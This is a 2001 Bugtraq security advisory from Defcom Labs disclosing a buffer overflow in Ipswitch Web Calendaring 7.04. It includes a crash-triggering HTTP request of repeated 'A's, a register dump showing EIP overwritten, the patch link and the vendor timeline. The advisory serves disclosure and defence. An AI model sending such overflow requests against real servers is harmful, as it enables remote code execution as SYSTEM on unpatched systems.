[22842] in bugtraq
def-2001-29
daemon@ATHENA.MIT.EDU (andreas junestam)
Fri Oct 12 11:11:20 2001
Message-ID: <3BC6CE30.8FB31AF3@defcom.com>
Date: Fri, 12 Oct 2001 13:04:16 +0200
From: andreas junestam <andreas.junestam@defcom.com>
MIME-Version: 1.0
To: bugtraq <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
======================================================================
Defcom Labs Advisory def-2001-29
Ipswitch Web Calendaring 7.04 Buffer Overflow
Author: Andreas Junestam <andreas@defcom.com>
Release Date: 2001-10-12
======================================================================
------------------------=[Brief Description]=-------------------------
When sending a request to the Web Calender (port 8484) longer than 97
bytes, a overflow will occur and EIP will be overwritten.
------------------------=[Affected Systems]=--------------------------
- Ipswitch Web Calendaring 7.04 and possibly earlier versions
----------------------=[Detailed Description]=------------------------
Sending a request like:
GET /'A' x 96 HTTP/1.0
Generates:
Access violation - code c0000005 (first chance)
eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e
edi=00000000 eip=61616161 esp=016f99fc ebp=61616161
61616161 ?? ???
This leaves us with the possibility to run code as SYSTEM. Mind though,
the server does a ToLower on the buffer BEFORE the overflow occours,
limiting the number of instructions we can use.
---------------------------=[Workaround]=-----------------------------
Download the new version from:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 1st of
October, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
http://labs.defcom.com http://www.defcom.com
======================================================================
